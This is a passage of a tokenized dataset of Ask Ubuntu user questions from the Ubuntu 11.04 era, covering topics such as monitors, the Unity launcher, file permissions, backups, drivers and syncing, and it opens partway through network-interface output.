txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) irq:5 endereço de e/s:0xe000 memória : fcffe000-fcffefff lo link encap : loopback local inet end . : 127.0.0.1 masc:255.0.0.0 endereço inet6 : : :1/128 escopo : máquina up loopback running mtu:16436 métrica:1 pacotes rx:628 erros:0 descartados:0 excesso:0 quadro:0 pacotes tx:628 erros:0 descartados:0 excesso:0 portadora:0 colisões:0 txqueuelen:0 rx bytes:50104 ( 50.1 kb ) tx bytes:50104 ( 50.1 kb ) inspiron @ inspiron : ~ $ nm-tool networkmanager tool state : connected - device : eth1 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : 802.11 wifi driver : ipw2100 state : unavailable default : no hw address : 00:0c : f1:5b:5d:40 capabilities : wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points - device : eth0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : e100 state : unmanaged default : no hw address : 00:11:43:41 : d8 : b8 capabilities : carrier detect : yes speed : 10 mb/s wired properties carrier : off inspiron @ inspiron : ~ $
42367	laptop screen wo n't stay off when connecting to an external monitor	when at home i prefer to plug my laptop into an external monitor , attach an usb mouse and keyboard , and pretend i 'm not working off of a laptop . works great at first ... however , my laptop monitor keeps turning back on . i go to system -- monitor preferences -- and turn off the laptop screen and it works beautifully . exactly how i want it to look . and then spontaneously ubuntu turns my laptop monitor back on , attaches it to the right of my desktop , and i loose my mouse from time to time ... it is not at any sort of regular interval that i have noticed -- but it happens more than once a day . have not noticed any regular behavior that causes it . by loading up monitor preferences i can select the laptop monitor and once again turn it off ... but i 'm getting a little tired of doing so . any suggestions ?
42369	html5 version of angry birds not rendering properly in any browser	see the attached screenshot . when i run angry birds in any of my browsers , pieces of the game are missing . this desktop is 32bit xubuntu with the pae kernel , if that affects anything . i 've tried with chromium , chrome , and firefox to no avail . i have the 64bit version of xubuntu on my laptop and the game appears to work just fine .
42370	cloudapp client ?	i like the concept of cloudapp , and i was wondering if there was a native client , or another service with similar functionality that is not dropbox or ubuntu one . requirements : drag 'n drop for file uploading , wishlist : it automatically copies the url to the clipboard .
42371	unity launcher behaves very weird	i recently upgraded to 11.04 , and the unity launcher is really giving me a headache : sometimes it gets stuck in the open mode . after turning on the `` auto hide '' in compiz-config it does disappear , but pops up every time my cursor goes to the left part of the screen in a way the does n't allow me to click on stuff there ( i.e . the back button in mozilla ) . configuring the `` reveal mode '' to be topleft , does n't help : the lancher does n't appear but still somehow blocks me from clicking stuff in the area where it 's supposed to be what 's up with that ?
42377	sync computers using ubuntu one without the cloud	i am looking for a way that i can synchronize the files on two computers ( assuming both run ubuntu ) without uploading the files to the cloud as ubuntu one does . windows live mesh does this natively ( i can synchronize essentially as many files/folders as i want , and pick and choose which of these i actually want `` backed up '' to the online cloud ) . so essentially , with windows live mesh , i can synchronize a large amount of data ( i currently sync something like 30gb ) between two computers , while only something like 1gb actually gets loaded to the cloud . is there a way to do this with ubuntu one or even ubuntu in general ? it seems a shame that ubuntu one should be limited to being able to do nothing more than any other fileshare program ( like dropbox ) can .
42382	my top panel is not visible	my top bar is not visible in ubuntu 11.04 .i upgraded it yesterday from 10.10 to 11.04 through internet but after restarting the top bar panels all vanished . how to activate my top bar ? ? ? ? ?
42384	how to debug why server is blocking outsite requests	i install ufw , gufw & firestarter yesterday , but uninstalled them all today . now , i find that i can not access the server from outsite . when i could before . how can i debug whats blocking these ?
42387	how do i make gnome panels transparent in classic mode ?	i would like to have my gnome panels transparent like i had them in 10.10 . i used this guide ( scroll down a bit ) to make them transparent in 10.10 , but it does n't seem to work , at least with the equinox themes . i am using 11.04 classic and the equinox dawn theme . if there 's anymore information needed for the problem , let me know and i 'll provide it . thanks a lot !
42388	how to go back to 10.10	i upgraded to 11.04 and have so many problems with the interface ( examples : ca n't change the time , i want the utility of the panels , half of gimp top menu bar is rendered non functional , no weather and much more ) . how do i go back to 10.10 without risking file loss ? my operating system and applications are in spanish .
42390	one click shutdown ubuntu and load into alternative bootup	i have a dual boot system with ubuntu 11.04 and windows 7 . my grub bootloader defaults to ubuntu . i mainly use ubuntu , but i occasionally need to bootup windows to do a few things . if i need to do something in windows i can `` shutdown '' ubuntu and select windows 7 in the bootloader . however , it would be more efficient if i could do this in one click from ubuntu . is it possible to press a key in ubuntu which means `` shut down , and then boot into windows '' ? ( or for that matter shut down and boot into any non-default bootup )
42391	ps3 eyetoy video camera not working in skype	as it says , tested the eyetoy with windows ( on laptop ) works fine tested with cheese , works fine tested with empathy , talkiong to msn messenger , also fine ! ! skype ? grrr black screen ... has anybody found a workaround please ?
42393	simple switching between multiple monitor configurations	context i use ubuntu 11.04 on a laptop . i have three monitor configurations : work : disable laptop monitor , use external 1920 x 1200 monitor home : disable laptop monitor , use external 1680 x 1050 monitor other : just laptop monitor i use nvidia x server settings to switch between monitor configurations . the ideal situation would be that the monitor configuration could be activated based on what external monitor was plugged into the laptop . another reasonable option would be to have a shortcut key that toggled between the three laptop configurations ( or perhaps three shortcut keys , one for each configuration ) . question how can i more simply switch between monitor configurations ? initial thoughts a user asked about automatic switching of monitor configurations on ubuntu forums with some more suggestions here i thought there might be some way of using a shortcut key to manipulate the xorg.conf file .
42394	how can i do a full image backup of my system ?	i 'm looking for a solution to create an exact copy of my system that i can restore in case of hard disk failure by simply putting a new hard drive and restoring from the backup . something like acronis trueimage . i 'm not interested in file based backups , although it 'd be a plus .
42398	shortcut key to simple textbox to perform google search	question what would be a good tool to enable me to press a shortcut key that brings up a simple textbox where i can type some search terms and then press enter to perform a google search ? additional points i know that i can press a shortcut key to start a browser and have google as my default search engine . this is too slow . i have read a little bit about lenses , but they sound like more than what i want . before switching to ubuntu , on windows i have used autohotkey to trigger a search box . i also really liked dave 's quick search bar many years ago when i was on xp . google desktop also sounds like more than what i want .
42402	how do i use bookmarks sync ?	i 'm using 11.04 natty here , and have enabled bookmarks sync in the ubuntu one configuration on my desktop . i have also done the same on my laptop . however , my bookmarks are not syncing . i figured there 'd probably be a little config utility for this , or a 'synchronize now ! ' button , but i 've not found anything of the sort . so , my basic question is this : how do i use the bookmarks sync ? edit : yes , i have bindwood installed and enabled on both computers . both computers also successfully synchronize files . however , bookmarks are not synchronizing .
42407	make command not work - assembler messages	*whats this message ? user1 @ ubuntu : ~ $ make kbuild_nopedantic=1 make -c /lib/modules/uname -r/build m=pwd make [ 1 ] : entering directory /usr/src/linux-headers-2.6.38-8-generic ' cc [ m ] /home/user1/src/wl/sys/wl_linux.o assembler messages : fatal error : ca n't create /home/user1/src/wl/sys/.tmp_wl_linux.o : permission denied /home/user1/src/wl/sys/wl_linux.c : in function ‘wl_attach’ : /home/user1/src/wl/sys/wl_linux.c:485:3 : error : implicit declaration of function ‘init_mutex’ make [ 2 ] : *** [ /home/user1/src/wl/sys/wl_linux.o ] error 2 make [ 1 ] : *** [ _module_/home/user1 ] error 2 make [ 1 ] : leaving directory/usr/src/linux-headers-2.6.38-8-generic ' make : * [ all ] error 2 how to solve problem ? * thank you fossfreedom . i did it , this is the result : chown : invalid option -- 'r ' try chown -- help ' for more information . user1 @ ubuntu : ~/src/wl/sys $ sudo chown -r user1 : user1 * chown : invalid option -- 'r ' trychown -- help ' for more information . ( my ubuntu ver . is natty 11.04 ) i tried chown -- help , i found that -r is correct , and i learnd -f suffix . but make command does not work and result is same as thah i wrote .
42411	file permissions : why ca n't i list a directory ?	i am able to list directories in a root shell , root @ thinkpad : ~ # ll /media/ total 36 drwxr -- r -- 6 root root 4096 2011-05-12 16:41 ./ drwxr-xr-x 22 root root 4096 2011-05-12 13:14 ../ drwxr-xr-x 5 root root 4096 2011-05-12 15:56 hd/ drwxr -- r -- 2 root root 16384 2011-05-12 14:20 lost+found/ drwxr-xr-x 5 root root 4096 2011-05-12 16:34 main/ drwxr -- r -- 4 root root 4096 2011-05-12 16:41 .trash-0/ but not from my user account : alex @ thinkpad : ~ $ ll /media/ ls : can not access /media/.. : permission denied ls : can not access /media/hd : permission denied ls : can not access /media/lost+found : permission denied ls : can not access /media/.trash-0 : permission denied ls : can not access /media/ . : permission denied ls : can not access /media/main : permission denied total 0 d ? ? ? ? ? ? ? ? ? ? ? ? ? ? ./ d ? ? ? ? ? ? ? ? ? ? ? ? ? ? ../ d ? ? ? ? ? ? ? ? ? ? ? ? ? ? hd/ d ? ? ? ? ? ? ? ? ? ? ? ? ? ? lost+found/ d ? ? ? ? ? ? ? ? ? ? ? ? ? ? main/ d ? ? ? ? ? ? ? ? ? ? ? ? ? ? .trash-0/ i do n't understand why i ca n't see files ( /media has a+r permission ) .
42412	i can not edit my main menu	when i right click on main menu and select edit menus nothing happens . i want to edit few of the menu items and i am stuck . how do i edit main menu now ?
42421	how to create multiple thunderbird mail accounts ?	how to create multiple thunderbird mail accounts in ubuntu 10.10 ? i just want to show only one account in each thunderbird shortcuts.. is it possible ?
42422	desktop sharing outside empathy	between empathy contacts , ubuntu desktops can be shared , how can it be done outside of empathy ? what applications and packages are involved ? note , i actually do not have any experience in sharing desktops ( due to lack of ubuntu-using contacts ) , but i need to be able to do so in my role of converting a school 's system to ubuntu as a member of a fledgling loco . edit i specifically require to set up a server that can access any computer on the network on request - i.e . if the server requests to view any computer , the computer should oblige without user interaction .
42423	how do i map the keyboard soft keys when they give no event notification ?	i have a silitek sk-2501b keyboard which has soft keys for volume and play pause and all that stuff . only the mute and suspend button work . when i run the xev utility to determine the keycodes that the dead ones give off i does not return anything . i assume next i should be looking for a driver but am unsure if it would be in x or in the kernel . what debugging steps do i take when xev gives nothing ?
42426	dual monitors : one monitor starts blinking and after a while turns black	i am using dual monitors in ubuntu 11 with classical interface ( not unity ) . i am using two monitors . the system can detect and automatically configure the monitors correctly . the problem is that after some time , one monitor will start blinking and after a while it will turn black . does any one know that it is the problem of my hardware or the problem of ubuntu system ? thank you very much in advance for your help ! anand
42429	ubuntu one - sync error	as soon as i start ubuntu one i am getting message `` file sync error ( auth failed ( auth_failed ) ) i am new to ubuntu . my version is 11.04 ( natty )
42436	mysql automatic backup tools	i use back-in-time for backuping up my projects . but my database 's are not included . i 'd like to backup all database 's scheduling by day or hours . is there any tool to backup mysql automatically ?
42438	what is the preferred way to store application settings ?	from a developer 's perspective . should i use a text-based config in /etc or in $ home ? or something else ?
42439	how can i get compiz grid working again ?	i upgraded to 11.04 and discovered that my video card ( a geforce go 7400 ) was blacklisted . i can live without unity but some of the other compiz features , that i depend on , are also unavailable -- the most important being placing windows with the grid plugin , and the most satisfying being the cube rotation . i have no idea why the former would be affected by my graphics card . i have tried forcing unity ( using the environment file ) but it crashes as the unity scholars promised . i have also switched to another driver ( 173 , i believe ) but that also has made no difference . lastly , i reset compiz back to its defaults . nothing has worked . what else can i try ? ( thanks . ) ( @ jorge : thank you for the formatting assist . ) update : in searching for compiz alternatives , i figured that i could set up metacity to handle the window management . in so doing , i realized that metacity had already become the default window manager , which explains why none of my compiz settings are having any effect . the real problem , then , is that i ca n't run compiz . using `` compiz -- replace '' freezes the screen . now that i have the equivalent of the grid functionality , i might stop while i 'm ahead . of course , that would be the first time i have ever stopped while i was ahead .
42441	how do remove the cd / dvd install as a source for apt-get packages when installing new features ?	i 'm running a ubuntu server ( 9.0.4 'jaunty ' ) as a vmware image . it 's a real pain on the odd occasion i need to install a new package to have to fish out the install cd-rom , and make it available to the vmware image so i can continue the package install . is there any way to take the original installation media out of the list of source packages - i 'm assuming all packages will be available on the internet . thanks .
42444	the list of running daemons	how to get the list of daemons and theirs statuses ( stopped , running , crashed , etc ) for each runlevel ? like rc-status in gentoo .
42448	prevent windows from opening fullscreen or remember window size positon and workspace	is there any way to prevent windows from opening up fullscreen at login in natty/11.04 ? or , to put it another way , is there a way to remember window size , workspace and position from one session to another ? thanks
42453	equivalent text editor to ms-dos editor	while i respect the power and flexibility of emacs , vim , etc , i miss ms-dos editor . it 's very simple to use , has a nice color display and a menu system which , if i remember correctly , you could navigate with the arrow keys . it 's very straightforward and user friendly . is there an equivalent in ubuntu ? title screen : find and replace :
42456	different users , different desktop managers	i 'm using ubuntu 11.04 since it was released , and , as many , i `` kinda '' like unity so far , but , i want to know if there is any way to have 2 users , one with unity and the other with classic gnome ? is there any way to configure users like this ? ty .
42461	i ca n't install thunderbird	i can not install thunderbird.tar.bz2 , after i extract the file , make command not work . this error appears : xxxxx @ ubuntu : ~ $ sudo make kbuild_nopedantic=1 make -c /lib/modules/`uname -r`/build m=`pwd` make [ 1 ] : entering directory `/usr/src/linux-headers-2.6.38-8-generic' cc [ m ] /home/xxxxx/src/wl/sys/wl_linux.o /home/xxxxx/src/wl/sys/wl_linux.c : in function ‘wl_attach’ : /home/xxxxx/src/wl/sys/wl_linux.c:485:3 : error : implicit declaration of function ‘init_mutex’ make [ 2 ] : *** [ /home/xxxxx/src/wl/sys/wl_linux.o ] error 1 make [ 1 ] : *** [ _module_/home/xxxxx ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-2.6.38-8-generic' make : *** [ all ] error 2
42465	how do i install `` user-theme '' extension for gnome 3 ?	is there any way ( preferably simple ) to install the user-theme extension for gnome 3 ?
42468	how do i set up edirol fa-66 firewire audio ?	i 'll confess that i 'm quite new to linux in general , so please do n't assume anything when answering . i 've been trying to find information online about this audio device . people generally claim that they got it working , but most of the chat about it was from 2007 and they make reference to things like freebob which has now been superceeded by ffado . they also refer to jack . i think this is for internal routing of audio , which i do n't currently need , afaik . mostly i just want to play audio out via this device . all my music creation software is done using windows/mac software for now . i 'm worried i 'm going to break my system in my naivety , so any tips would be appreciated . ( note , not enough reputation to tag as firewire )
42471	how can i keep menu bar on the applicaton on unity ?	i want to display the menu of the application in application top not in the unity bar . how to do this ? it is possible ?
42473	how to make unity launcher menu be almost always hidden and not influence window placement	i 'm using unity on 11.04 . i 've had a look at the compiz-config settings but could not find any answers . i would like to change a few default settings in unity launcher . i would like to apply settings so that : launcher is only displayed when i press the ubuntu button ( or the super key ) ( or move the cursor to the top right of the screen ) . i.e. , it is hidden even when there are no windows obscuring it . launcher does not influence placement of windows ( i.e. , unity should happily position a window aligned flush with the left side of the screen instead of defaulting to making space for the launcher )
42480	set xmodmap control modifier combination	what is the syntax for making ctrl+q emit kp_7 ? how to revert it back ? i 've read the man page but it does not provide example .
42482	how to safely shutdown guest os in virtualbox using command line	i have ubuntu 10.10 and using virtualbox 3.2 . as a guest os i have another ubuntu in the virtualbox . i am starting guest ubuntu automatically using following command once my host ubuntu boots : vboxheadless -startvm ubuntu -- vrdp on then i can access to it with ssh or tsclient . now i need to shutdown automatically guest ubuntu once i shutdown my host ubuntu . does anybody know any safe method to automatically shutdown guest ubuntu with a command line ? i have found out two ways one can shutdown guest os but i am not sure whether they are safe or not . here are they : vboxmanage controlvm ubuntu acpipowerbutton or vboxmanage controlvm ubuntu poweroff
42488	how to list compiz keybindings in use ?	other than looking though each active plugin and manually searching for keybindings / keyboard-shortcuts in use by compiz , is there a 'simple ' way to gather this information ? i.e . some panel that displays all currently active keybindings in use ( by compiz ) , or some terminal command to do same . keyboard-shortcuts does not appear to list certain specific compiz shortcuts . thanks
42489	how can i get keyboard shortcuts working for tomboy ?	for some reason the tomboy keyboard shortcuts are n't working for me in 11.04 . i 've tried disabling/enabling them in the preferences window , setting them to different keys , nothing works . also , configuring a gnome keyboard shortcut to run tomboy -- new-note fails too ( the problem with the latter is that it always tries to start another instance of tomboy , and does n't manage to open a new note ) . does anyone know how to get keyboard shortcuts working for tomboy on 11.04 ?
42490	how to change permissions of .gvfs in my home folder	my home folder has a listing for.gvfs like this d ? ? ? ? ? ? ? ? ? ? ? ? ? ? .gvfs/ how do i change that permission ? chmod and chown does not seem to work ! gives me permission denied error chown : can not access `.gvfs ' : permission denied
42494	how can i change the nvidia gpu fan speed ?	so im trying ubuntu again after being off it for awhile in win7 i can set gpu fan to 10-30 % and its barly reaching 52c , however with ubuntu nvidia set it to 55 % wich is really loud on my msi 460gtx . this is the only thing that keeps me from using ubuntu is there really no program or way to set manually like msi afterburner / evga precision , temperature curve & fan speed ? . default fan is way to loud and its barly 3 c diffrence from 25 % gpu fan speed to 55 % but the noise is alot more .
42503	what team do i need to talk to about deleting a page on help.ubuntu.com ?	i would like to delete a junky page from help.ubuntu.com , but it seems i do not have access to the page , what team should i talk to to have the page removed ?
42505	is there anyway to fix this wine problem ?	picture says it all . is there any way to fix this ?
42507	how can i configure internet proxy on vm ?	i am running ubuntu 10.04 on vmplayer within windows 7 . our corporation has just enforced an internet proxy , let 's call it internet.largecompany.com:8443 for the sake of argument , and we can no longer get access to outside sites . we can get access to the internet without any issues on windows but no access at all from ubuntu . i 've tried changing the proxy settings in system > preferences > network proxy along with providing my username and password but to no avail . any ideas ? anything i should try ?
42513	move entire os from ntfs drive to bigger ext4 drive	according to smart data , the hard drive i curently use is about to fail . i bought a new , bigger drive to copy the system to a safer place . the old drive is 160gb . ubuntu was installed with wubi , and the partition is ntfs . there are a few other partitions around ( recovery partition , swap ... ) that i do n't care about . the new drive is 320gb . i would like the new system to run on ext4 , not on ntfs . i looked at solutions that use dd , or clonezilla , but it seems that moving to a different filesystem prevents me from using them . i considered installing a brand new ubuntu on the new hard drive and then copy /home from the old drive to the new drive , but i heard that there would be file permission problems . i would also have to reinstall all my software . one last thing : the ntfs drive has dead sectors . i do n't know how this can influence the copy process , but i mention it just in case . edit : i do not care about the windows partition . i just want ubuntu to make the transition .
42518	how to setup lamp environment ?	i have been using xamp in windows for a long time . recently i have moved to ubuntu and now want to have a similar environment to develop my php websites . how can i setup the lamp environment in ubuntu ? should i have to install each and every app in that stack separately or is there a single package that contains all ?
42519	can i open visual basic .vbp files using gambas ?	i had installed gambas 2.21 but i can not open .vbp files format . why ? if it can , how to do it ?
42522	will videos/slides from the uds be available ?	will videos/slides from the uds be available on the internet and if so where ? i 've been searching for them but all i could find was some session logs .
42523	can not use windows font in visual basic using wine ?	i just installed visual basic 6.0 in my ubuntu 10.10 using wine but it can not view the windows font.. why ? theres any way to use it ?
42532	what media ( music and video ) players are there ?	this question is present as a matter of historical interest . while you are encouraged to help maintain its answers , please understand that `` big list '' questions are not generally allowed on ask ubuntu and will be closed per the faq . what media ( music and video ) players are there ? please list one piece of software per answer , as per this meta post .
42548	mouse ( in virtualbox ) scrolls horizontally	( the context of this question is within virtualbox , but afaik it should n't really be different ) i have a microsoft 5-button mouse plugged in , to which scrolling scrolls horizontally . any ideas ? xinput list : ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ virtualbox usb tablet id=8 [ slave pointer ( 2 ) ] ⎜ ↳ imexps/2 generic explorer mouse id=10 [ slave pointer ( 2 ) ] ⎜ ↳ ( unnamed ) id=11 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ sleep button id=7 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=9 [ slave keyboard ( 3 ) ] edit : this question is a pretty close duplicate of my mouse wheel has stopped scrolling up and down.. could someone possibly mark it as a duplicate ?
42550	how can i move the applications and files & folders lenses in the launcher ?	in the launcher there are two types of launcher items . the default ones in the bottom part of the launcher , such as the workspace switcher , applications lens , files & folders lens and trash , and the other normal launcher items in the upper part of the launcher , such as the browser that i 've added . it seems i ca n't mix the two types of launchers and change the position of the two groups . is there any way to change that behavior ?
42551	can i use the same home folder on different linux systems ( multiboot ) ?	when installing more than one linux version on the same computer ( for testing purposes e.g . ubuntu 10.10 and 11.04 ) , is it possible to have the same home folder ( e.g . on a separate partition ) on all operating system versions ?
42564	why are the hidden settings-folders not deleted when purging an application ?	i did sudo apt-get remove -- purge for several packages , but apparently the personal settings are kept . is there a command or tool to delete them automatically ?
42574	will gnome3 installation break lubuntu ?	i installed lubuntu on my netbook and i 'm wondering whether it is safe to install gnome3 via ppa or if it will break the system just like in ubuntu . my logical thought is that since there is no gnome , there 's nothing to break , but i ' d like to have this confirmed . thanks for your time !
42575	how to disable mounting of external drive at boot ?	okay so i 'm not exactly sure how it happened , but recently ubuntu has been trying to mount an external hard drive that i usually have plugged in during boot . a message comes up during boot asking me to either wait , or press s to skip if the drive is n't plugged in when i start up my laptop . my question is , how do i disable this drive from mounting at startup so i do n't have to prompt ubuntu to skip it at boot ? i 've looked up a couple other solutions to this , but all of them only seem to completely disable automounting , which would require me to manually mount the device when it 's plugged in , which is not what i want . i just want to disable it from mounting at startup .
42576	how to install gnome2 on xubuntu ?	how to install gnome2 on xubuntu 11.04 ?
42577	is it possible to blend the new natty app bar with ubuntu classic ?	i know this is an odd question . i like the top and bottom panels of ubuntu classic , but i also like the natty app bar as well . is there a way to blend the two ? i know ... why do i need the bottom bar if i have the app bar ? old ways die hard , thats why : ) i also like the old top panel feature of `` applications | places | system '' ... yet all that said , id like to have the new dock ( ok , not dock , but natty app bar ) . i would think this blending of old and new would be a great way to transition long time users who are , uhhhh , nervous of change : ) any tips or ideas ? thanks !
42579	displex terminal path issue	i last installed displex from here : http : //sourceforge.net/projects/displex/files/ since then i 've been having a small problem with my terminal . each time i open my terminal while displex is running my default location is set to `` /usr/share/indicator-displex $ instead of~ $ ` . i do n't have any problem running my commands but i would like to have it going to ~ $ without having to do cd ~ every time .
42585	some problems with unity interface dialog box buttons	hello i 've installed ubuntu 11.04 on my laptop , i 'm running unity with no problem except sometimes when i open a dialog box , for instance , the properties of a file , the buttons close and help located at the bottom of window do n't work when i click on them . i have to move me with keyboard tab button and press enter or use alt + ( the first letter of button ) . fortunately this case is easy because i can close the windows doing click over 'x ' button window ( this always work ) too . but sometimes it happens on others dialog box windows of another programs and it 's a waste of time have to move with tab key or whatever , , , this happens with any button of unity windows interface , for instance if you are using gimp and you want to save a file it can be possible save button does n't respond to mouse clic , sometimes the same thing with buttons of system settings ( i.e synaptic button ) , simply the button does n't respond , the rest of system remains working well when it happens , nothing crash apparently . it occurs with no prediction on any button and window dialog box , i do n't know whether is a unity problem or other thing ! thanks in advance ! sony vaio laptop - g210m geforce - 4gbyte main ram , core 2 duo -- -
42588	msi rx1950 pro-series pci-e video card - is there a way to make 3d functions work ?	i have the 3d-card in the subject . it is ati-based . i know proprietary driver support for linux has been dropped a while ago , so i have been struggling for years now , with no success ... my high-performance 3d card works as a standard vga only . that is why i currently run with unity-2d . even trying the xorg-edgers ppa is not make it work . can anyone help me ?
42590	is there a command or tool to delete unneccessary settings in the home-folder automatically ?	i want to get rid of all the settings eg . of wine which are n't deleted when purging it , but do n't want to delete them all by hand . is there any tool , that lets me do this ? if not that might be a coding-idea for some one ?
42596	how to easily open the launcher with a secondary monitor to the left	i have two monitors ( 24 '' as main and a 19 '' to the left ) . each time i want to swap to a different application or launch a new one , the launcher seems a little problematic to come up . even though moving my mouse across the top ubuntu logo gets it up , it still seems quite spasmodic . anybody else found a problem and is there a solution ?
42600	is there any app or workaround to blacklist or whitelist apps and websites ?	i get distracted easily and need something like this .
42601	lame conversion without extension	i have a list audio file paths and extensions in a csv file that looks like this : path extension ~/src/0000 .wav ~/src/0001 .aif ~/src/0002 .wav i need to run lame on each file converting it to a standard format . the problem is lame wo n't run on a source file without an extension . is it possible to specify a file extension ( as a parameter ) without renaming the source file ( renaming will be difficult in my case ) ? my current efforts yield : > lame ~/src/0000 ~/dst/0000.mp3 warning : unsupported audio format
42607	can not remove itunes ( installed with wine ) from unity applications lens	i installed itunes 10 via playonlinux and later uninstalled it . however , the app icon still shows up in unity 's applications lens and i cant find where to delete it at all . i tried looking in usr/local/application and in usr/share/application etc . etc . i 've also searched the whole computer : apple software update , about itunes , quicktime , etc . etc. , but itunes still shows up in my applications lens and is clickable . when i click it , the lens closes as if to launch itunes but since it 's been uninstalled , nothing happens . please help , this is annoying as hell and i just switched from win 7 to natty . i do n't need wine but want my app lens back to normal .
42608	google video command line download	is there a way to download the original ( flv ) video files from google video from the command line , just like youtube ?
42610	uninstalled python package , now the system is broken	while trying to free some space by unistalling some useless applications , i accidently have choosen the python file to be unistalled , then something wrong happens , most of programs of ubuntu 10.10 were unistalled and much worse , the laptop was not responding . i tried to restart , then i had the bad surprise : and error message saying that the graphic interface is not available anymore , i can access in a textual mode , do you think that i can get back my installation without reinstalling all the os ? please help me if you can .
42611	is there a way to make suspend by closing the lid always possible on a samsung nc10 ?	recently i installed natty on a samsung nc10 netbook . most of the time , suspend by closing the lid works . but sometimes it just stays in its current state . going to suspend by accessing the menu seems to work always on the other hand . so is there a way to make suspend work on closing the lid always as well ? edit : additional information : in the power management , both cases ( battery and power line ) are set to `` suspend '' when closing lid . the only things in the pm-suspend.log that do n't look right are : having networkmanager put all interaces to sleep ... failed . and failed to connect to wpa_supplicant - wpa_ctrl_open : no such file or directory however , suspending seems to go on after that . after a failed suspend attempt by closing the lid attempt , nothing new is written to pm-suspend.log . the only new ( shown bold there ) thing in logs is [ drm ] big fifo is enabled in syslog and kern.log . however , resume always works as well as suspend from power-indicator-button top right . it would be great when closing the lid would do just the same .
42615	how can i set up twin view on 11.04 with a matrox g400/g450 ?	i 've been trying , quite unsuccessfully , to set up `` twin view '' on 11.04 with a matrox g400/g450 . at this point i ca n't recall what i may have tried . currently each monitor is displaying the same video and pressing `` detect monitors '' within system - > preferences - > monitors does nothing . i have scoured the interwebs for instructions , tried several of them to no avail . most recently i read through several threads on the ubuntu forums and it seems many others have the same problem with no resolution . thank you for your time !
42619	how do i restore old empathy logs from a previous installation ?	i 'm an absolute beginner at all of this . please could someone clearly explain ( without assumption of any prior knowledge of operating ubuntu , let alone 11.04 ) how i restore old empathy logs now that i have 11.04 . i know that i kept my old stuff in a partition but i do n't know what to do to bring it back . the man who did this to my machine managed it last time but i 'm without him and clueless . please help . thanks .
42627	is it possible to login in unity when the nomodeset parameter is set ?	i need to set the nomodeset parameter when booting from grub to make the new kernel 2.6.38 work . the first time i did it i got a message stating that for some kind of limitation i could n't login with unity , i suppose it was related to this parameter . if i boot with the 2.6.35 everything is working perfectly ( nomodeset needs not to be set ) , and unity is ok. is it somehow possible to login with unity even if the nomodeset parameter is set ? thanks !
42630	unity wo n't load at login , but starts in classic after running unity -- reset	i have a dell latitude e6400 laptop . i 've had ubuntu 10.04 64-bit working for years . i decided to update to 11.04 ( via 10.10 ) and it 's fine except unity wo n't load . i get the backdrop , the wifi network notification , and i can see the mouse pointer . ctrl+alt+delete gives me the restart/shutdown/etc . options . if i select ubuntu classic at the login screen , it loads fine . i 've tried fiddling with a few ccsm settings but it makes no difference . i 've disabled gnome compatibility , and enabled the unity plugin . if i type : unity -- reset from classic mode it loads up unity , suggesting there 's no obvious problem with the drivers . there are some error messages but i lose the ability to move windows around at this point and i do n't seem to be able to cut/paste the messages . i did fiddle with compiz in the past to get the appearance menu to allow me to select none for animations and have it stick . perhaps i have to uninstall/reinstall something ? this is very annoying - it seems like i 'm very close to having it working but i do n't know what to try next . any suggestions ?
42637	boot failure randomly . can someone help ?	i often get stuck at the boot on battery . i can suspend and hibernate without any trouble ( even on battery ) . if i plug the energy cable everything goes right most of the time ( edited june 13 ) . adding `` acpi=off '' does n't solve the issue . disabling power save from lan at bios does n't solve this too . memory test seems to be ok : i can even compile a kernel without a problem : has someone a tip for this ? ( i have the same questions marks in my mind as the image shows if not more : -/ ) obs . : this is an upgraded installation from natty alpha . edited i ( may 22 ) : i 've installed a brand new final 11.04 and got the bug again . edited ii ( june 13 ) : i thought it was solved but it is not . after spending eight days off , the same problem happened even with the power cable connected . i had to reboot about 6 times until success . edited iii ( june 14 ) : i can boot ( even with battery ) if i disconnect the cable and take off the battery for a few seconds . this lead me to conclude that maybe something is kept into memory of some hardware . maybe or maybe not related but i also have touchpad issues ( jumps ) with this machine . edited iv ( june 25 ) : i opened gconf-editor and went to apps > gnome-power-manager and disabled everything possibly related to suspend or hibernate . no help . also i grabbed a fedora live usb pendrive and got the same problem : so i think it is a hardware problem related issue .
42639	multimedia keys ( xf86audio* ) not shown by xev , even though still working	i 'm using a lenovo sl400 laptop , and even though the audio multimedia keys ( xf86audioplay , xf86audiostop , xf86audioprev and xf86audionext ) are not shown with xev , they work anyway with gmusicbrowser , exaile and rhythmbox . i 'm not using xbindkeys nor xmodmaprc . is this something normal ? if xev does n't see these keys , why those multimedia apps respond to them ? edit : i 'm using xubuntu 11.04 , and with version 10.10 these keys were recognized by xev . and with xfce running on 11.04 , through settings manager , section keyboard , these keys can be mapped to whaterever the user wants .
42642	is there any program or add-ons to download flv from website ?	i just need some sort of programs that can download flv from website like youtube and other .
42647	dash sometimes stuck open ; how to force it to close without logging out	i 've had a problem with the dash bar in ubuntu ( 11.04 ) unity getting `` stuck open '' . it happens when i 'm dragging songs to a playlist in clementine . in any case , once it 's stuck open , i have n't found any way to close it without logging out and logging back in . ( i 've tried going into about : config and changing the hide condition , but this does n't help once the dash is stuck open ) . so my question is : how to force the dash to close once it 's stuck open ? [ the issue itself is a bug in unity : see https : //bugs.launchpad.net/unity/+bug/769703 ]
42652	how to keep nautilus or another program in memory to run more fast ?	how can i make nautilus , or another program that is always loaded in swap memory , open instantaneously , like it does in osx ? osx has the finder and some programs always loaded in memory or 'minimized ' , so that they instantly open . i would like to keep nautilus always open/loaded in memory so that loading it is instantaneous . i have installed preload but it did not achieve the effect i want . i have a macbook 4.1 core2duo with 4gb of ram . thanks in advance and greetings .
